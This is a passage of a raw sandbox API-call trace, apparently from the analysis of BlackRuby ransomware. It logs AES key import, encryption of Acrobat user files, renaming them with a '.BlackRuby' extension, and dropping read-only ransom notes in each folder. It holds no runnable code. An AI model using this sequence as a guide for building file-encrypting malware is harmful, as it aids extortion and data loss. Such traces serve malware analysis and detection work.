lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", lpFilePart=0x0) returned 0x50 [0051.861] GetLastError () returned 0x0 [0051.861] SetErrorMode (uMode=0x1) returned 0x0 [0051.861] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb989790, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb989790, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xef467a30, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0xa)) returned 1 [0051.861] GetLastError () returned 0x0 [0051.861] SetErrorMode (uMode=0x0) returned 0x1 [0051.861] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c818) returned 1 [0051.862] GetLastError () returned 0x0 [0051.959] CryptImportKey (in: hProv=0x37c818, pbData=0x1d3f7a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360a20) returned 1 [0051.959] GetLastError () returned 0x0 [0051.959] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.959] GetLastError () returned 0x0 [0051.970] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360da0) returned 1 [0051.970] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1b655f8*=0x1, dwFlags=0x0) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1b655c4, dwFlags=0x0) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b65640*, pdwDataLen=0x18eb58*=0x100, dwBufLen=0x100 | out: pbData=0x1b65640*, pdwDataLen=0x18eb58*=0x100) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6586c*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b6586c*, pdwDataLen=0x18eb70*=0x10) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b6589c*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b6589c*, pdwDataLen=0x18eb78*=0x10) returned 1 [0051.970] GetLastError () returned 0x0 [0051.970] CryptDestroyKey (hKey=0x360a20) returned 1 [0051.970] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.970] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.970] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", lpFilePart=0x0) returned 0x50 [0051.970] GetLastError () returned 0x0 [0051.970] SetErrorMode (uMode=0x1) returned 0x0 [0051.970] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.973] GetLastError () returned 0xb7 [0051.973] GetFileType (hFile=0x184) returned 0x1 [0051.973] SetErrorMode (uMode=0x0) returned 0x1 [0051.974] GetFileType (hFile=0x184) returned 0x1 [0051.976] CloseHandle (hObject=0x184) returned 1 [0051.976] GetLastError () returned 0xb7 [0051.976] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", lpFilePart=0x0) returned 0x50 [0051.976] GetLastError () returned 0xb7 [0051.976] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\Encrypted_w7ZQlfOlQLltUd8dtDAbtvrI7iuSt4OKENRN8n6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\Encrypted_w7ZQlfOlQLltUd8dtDAbtvrI7iuSt4OKENRN8n6.BlackRuby", lpFilePart=0x0) returned 0x7b [0051.976] GetLastError () returned 0xb7 [0051.976] SetErrorMode (uMode=0x1) returned 0x0 [0051.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb989790, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb989790, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0x272e96e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x110)) returned 1 [0051.976] GetLastError () returned 0xb7 [0051.976] SetErrorMode (uMode=0x0) returned 0x1 [0051.976] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\Encrypted_w7ZQlfOlQLltUd8dtDAbtvrI7iuSt4OKENRN8n6.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\encrypted_w7zqlfolqlltud8dtdabtvri7iust4okenrn8n6.blackruby")) returned 1 [0051.977] GetLastError () returned 0xb7 [0051.977] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x58 [0051.977] GetLastError () returned 0xb7 [0051.977] SetErrorMode (uMode=0x1) returned 0x0 [0051.977] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.977] GetLastError () returned 0x5 [0051.979] SetErrorMode (uMode=0x0) returned 0x1 [0051.979] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpFilePart=0x0) returned 0x3c [0051.979] GetLastError () returned 0x5 [0051.979] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.982] GetLastError () returned 0x5 [0051.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.982] GetLastError () returned 0x5 [0051.982] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpFilePart=0x0) returned 0x3c [0051.982] GetLastError () returned 0x5 [0051.982] SetErrorMode (uMode=0x1) returned 0x0 [0051.982] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0051.982] GetLastError () returned 0x5 [0051.982] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.982] GetLastError () returned 0x5 [0051.983] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.983] GetLastError () returned 0x5 [0051.983] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.983] GetLastError () returned 0x5 [0051.983] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.983] GetLastError () returned 0x12 [0051.983] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0051.983] SetErrorMode (uMode=0x0) returned 0x1 [0051.983] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpFilePart=0x0) returned 0x3c [0051.983] GetLastError () returned 0x12 [0051.983] SetErrorMode (uMode=0x1) returned 0x0 [0051.983] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0051.983] GetLastError () returned 0x12 [0051.984] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.984] GetLastError () returned 0x12 [0051.984] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.984] GetLastError () returned 0x12 [0051.984] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.984] GetLastError () returned 0x12 [0051.984] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.984] GetLastError () returned 0x12 [0051.984] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0051.984] SetErrorMode (uMode=0x0) returned 0x1 [0051.984] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata", lpFilePart=0x0) returned 0x51 [0051.984] GetLastError () returned 0x12 [0051.984] SetErrorMode (uMode=0x1) returned 0x0 [0051.984] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), fInfoLevelId=0x0, lpFileInformation=0x1b85a70 | out: lpFileInformation=0x1b85a70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe50712d0, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xe50712d0, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe5097430, ftLastWriteTime.dwHighDateTime=0x1d2da18, nFileSizeHigh=0x0, nFileSizeLow=0x1517)) returned 1 [0051.985] GetLastError () returned 0x12 [0051.985] SetErrorMode (uMode=0x0) returned 0x1 [0051.986] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0051.986] GetLastError () returned 0x12 [0051.986] SetErrorMode (uMode=0x1) returned 0x0 [0051.986] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.986] GetLastError () returned 0x0 [0051.986] GetFileType (hFile=0x184) returned 0x1 [0051.986] SetErrorMode (uMode=0x0) returned 0x1 [0051.986] GetFileType (hFile=0x184) returned 0x1 [0051.986] WriteFile (in: hFile=0x184, lpBuffer=0x1ba17e4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb7c, lpOverlapped=0x0 | out: lpBuffer=0x1ba17e4*, lpNumberOfBytesWritten=0x18eb7c*=0x18da, lpOverlapped=0x0) returned 1 [0051.987] GetLastError () returned 0x0 [0051.987] CloseHandle (hObject=0x184) returned 1 [0051.987] GetLastError () returned 0x0 [0051.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0051.987] GetLastError () returned 0x0 [0051.987] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0051.987] GetLastError () returned 0x0 [0051.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpFilePart=0x0) returned 0x45 [0051.987] GetLastError () returned 0x0 [0051.987] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.987] GetLastError () returned 0x0 [0051.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.988] GetLastError () returned 0x0 [0051.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpFilePart=0x0) returned 0x45 [0051.988] GetLastError () returned 0x0 [0051.988] SetErrorMode (uMode=0x1) returned 0x0 [0051.988] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0051.988] GetLastError () returned 0x0 [0051.988] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.988] GetLastError () returned 0x0 [0051.988] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.988] GetLastError () returned 0x0 [0051.988] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.988] GetLastError () returned 0x0 [0051.988] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.989] GetLastError () returned 0x12 [0051.989] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0051.989] SetErrorMode (uMode=0x0) returned 0x1 [0051.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpFilePart=0x0) returned 0x45 [0051.989] GetLastError () returned 0x12 [0051.989] SetErrorMode (uMode=0x1) returned 0x0 [0051.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0051.989] GetLastError () returned 0x12 [0051.989] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.989] GetLastError () returned 0x12 [0051.989] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.989] GetLastError () returned 0x12 [0051.989] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.989] GetLastError () returned 0x12 [0051.989] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.989] GetLastError () returned 0x12 [0051.990] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0051.990] SetErrorMode (uMode=0x0) returned 0x1 [0051.990] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpFilePart=0x0) returned 0x72 [0051.990] GetLastError () returned 0x12 [0051.990] SetErrorMode (uMode=0x1) returned 0x0 [0051.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), fInfoLevelId=0x0, lpFileInformation=0x1ba5024 | out: lpFileInformation=0x1ba5024*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe4c6cdb0, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xe4c6cdb0, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe5d40530, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x3a5)) returned 1 [0051.990] GetLastError () returned 0x12 [0051.990] SetErrorMode (uMode=0x0) returned 0x1 [0051.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0051.991] GetLastError () returned 0x12 [0051.991] SetErrorMode (uMode=0x1) returned 0x0 [0051.991] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.006] GetLastError () returned 0x0 [0052.006] GetFileType (hFile=0x184) returned 0x1 [0052.006] SetErrorMode (uMode=0x0) returned 0x1 [0052.006] GetFileType (hFile=0x184) returned 0x1 [0052.006] WriteFile (in: hFile=0x184, lpBuffer=0x1bc0e40*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1bc0e40*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0052.007] GetLastError () returned 0x0 [0052.007] CloseHandle (hObject=0x184) returned 1 [0052.007] GetLastError () returned 0x0 [0052.007] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0052.007] GetLastError () returned 0x0 [0052.007] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0052.008] GetLastError () returned 0x0 [0052.008] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpFilePart=0x0) returned 0x72 [0052.008] GetLastError () returned 0x0 [0052.008] SetErrorMode (uMode=0x1) returned 0x0 [0052.008] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), fInfoLevelId=0x0, lpFileInformation=0x1bc2b6c | out: lpFileInformation=0x1bc2b6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe4c6cdb0, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xe4c6cdb0, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe5d1a3d0, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x9347)) returned 1 [0052.008] GetLastError () returned 0x0 [0052.008] SetErrorMode (uMode=0x0) returned 0x1 [0052.008] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0052.008] GetLastError () returned 0x0 [0052.008] SetErrorMode (uMode=0x1) returned 0x0 [0052.009] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.009] GetLastError () returned 0x5 [0052.010] SetErrorMode (uMode=0x0) returned 0x1 [0052.010] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x33 [0052.010] GetLastError () returned 0x5 [0052.010] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.010] GetLastError () returned 0x5 [0052.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.011] GetLastError () returned 0x5 [0052.011] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x33 [0052.011] GetLastError () returned 0x5 [0052.011] SetErrorMode (uMode=0x1) returned 0x0 [0052.011] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.011] GetLastError () returned 0x5 [0052.011] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.011] GetLastError () returned 0x5 [0052.012] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.012] GetLastError () returned 0x5 [0052.012] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: 